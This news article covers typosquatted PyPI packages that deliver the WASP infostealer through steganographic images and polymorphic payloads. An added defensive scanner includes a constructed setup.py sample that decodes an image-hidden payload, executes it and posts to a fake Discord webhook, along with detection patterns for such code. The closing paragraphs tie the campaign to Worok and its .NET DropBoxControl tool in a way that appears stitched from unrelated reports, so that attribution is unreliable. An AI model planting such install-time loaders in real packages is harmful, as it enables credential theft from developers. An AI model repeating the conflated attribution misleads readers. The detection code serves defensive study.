This infostealer has a vicious sting for Python developers


Checkmarx cybersecurity researchers have discovered more than two dozen malicious packages on PyPI, a popular repository for Python developers, and have released their findings in a new report.

These malicious packages are given names nearly identical to those of legitimate packages, so that a developer who mistypes a name or does not check it carefully installs the wrong one and runs the malware.

This practice is known as typosquatting and is popular among cybercriminals who target software developers.

Infostealer thefts

To hide the malware, the attackers use two evasion techniques: steganography and polymorphism.

Steganography is the practice of hiding data, in this case code, inside another file such as an image, so that the malicious code can be distributed via seemingly innocuous .JPG and .PNG files that look like ordinary content to a reviewer or a scanner.

Polymorphic malware, on the other hand, changes its payload with each install, so that signature-based antivirus products and other scanning tools that rely on matching known samples do not recognise it.

Here, the attackers used these techniques to deliver WASP, an infostealer that grabs Discord accounts, passwords, cryptocurrency wallet information, credit card details, and whatever other information on the victim's endpoint it deems interesting.

Once identified, the data is sent back to the attackers via a hard-coded Discord webhook address.
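Several of the indicators described above can be checked for statically before a package's setup.py is ever executed: a hard-coded Discord webhook URL, a call to exec or eval whose argument is produced by a decoder or decompressor at runtime, and code that loads an image before doing so. The scanner below is an added example written for this article, not Checkmarx's tooling; the SAMPLE source it runs over is constructed for the demo (the webhook ID and token in it are made up), and the list of image-loading and decoding function names is an assumption about what such loaders typically call, not a claim about what WASP itself used.

```python
"""Static scan of Python source for the indicators the article describes.

Added example, not from the Checkmarx report. SAMPLE below is constructed; the
webhook in it is not real. DECODERS and IMAGE_LOADERS are assumed names of
commonly used helpers, not WASP's own.
"""
import ast
import re

# Discord webhook URLs share one shape: numeric ID followed by a token.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+"
)
DYNAMIC_EXEC = {"exec", "eval"}
DECODERS = {"b64decode", "b32decode", "a85decode", "unhexlify", "decompress"}   # assumption
IMAGE_LOADERS = {"Image.open", "imread", "lsb.reveal"}                            # assumption


def _call_name(node: ast.Call) -> str:
    """Dotted name of a call target: 'exec', 'base64.b64decode', 'Image.open'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def scan_source(src: str):
    """Return a list of (indicator, detail) findings for one Python source file."""
    findings = [("discord_webhook", m.group(0)) for m in WEBHOOK_RE.finditer(src)]
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        last = name.split(".")[-1]
        if last in DYNAMIC_EXEC:
            # exec/eval fed by a decoder or decompressor rather than a literal: the
            # payload is assembled at runtime so the file on disk never contains it.
            inner = (n for n in ast.walk(node) if isinstance(n, ast.Call) and n is not node)
            if any(_call_name(n).split(".")[-1] in DECODERS for n in inner):
                findings.append(("exec_of_decoded_payload", f"line {node.lineno}"))
            else:
                findings.append(("dynamic_exec", f"line {node.lineno}"))
        if name in IMAGE_LOADERS or any(name.endswith("." + s) for s in IMAGE_LOADERS):
            findings.append(("image_loaded", f"line {node.lineno}"))
    return findings


def severity(findings) -> str:
    """Combine indicators: exfil channel plus runtime-assembled code is the article's pattern."""
    kinds = {k for k, _ in findings}
    execs = kinds & {"exec_of_decoded_payload", "dynamic_exec"}
    if "discord_webhook" in kinds and execs:
        return "high"
    if "exec_of_decoded_payload" in kinds or ("image_loaded" in kinds and execs):
        return "medium"
    return "low"


# Constructed sample setup.py fragment; the webhook is made up and the LSB read is a toy.
SAMPLE = '''
import base64, zlib
from PIL import Image
import requests

HOOK = "https://discord.com/api/webhooks/000000000000000000/constructed-token-not-real"
img = Image.open("logo.png")
blob = bytes(px[0] & 1 for px in img.getdata())
exec(zlib.decompress(base64.b64decode(blob)))
requests.post(HOOK, json={"content": "installed"})
'''

if __name__ == "__main__":
    for kind, detail in scan_source(SAMPLE):
        print(f"{kind:24} {detail}")
    print("severity:", severity(scan_source(SAMPLE)))
```

Because the polymorphic variants change the encoded blob but not the surrounding loader, matching on the structure (decode feeding exec, image loaded, webhook URL) holds up where a hash or byte signature of the payload would not. Run it as a pre-install hook over the sdist's setup.py and any module it imports, since that is the code pip executes on the developer's machine.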

The campaign appears to double as a marketing stunt: the researchers saw the threat actors advertise the tool on the dark web for $20 and claim it is undetectable.

In addition, the researchers believe this is the same group that was behind a similar attack first reported earlier this month by researchers from Phylum and Check Point. At the time, it was reported that a group called Worok had been distributing DropBoxControl, a custom .NET C# infostealer that abuses Dropbox file hosting for command-and-control and data theft, since at least September 2022.

Given the toolkit, the researchers believe Worok is a cyber-espionage group that operates quietly, moves laterally across target networks and steals sensitive data. It also appears to use its own proprietary tools, as the researchers have not observed them being used by anyone else.

Via: The Register
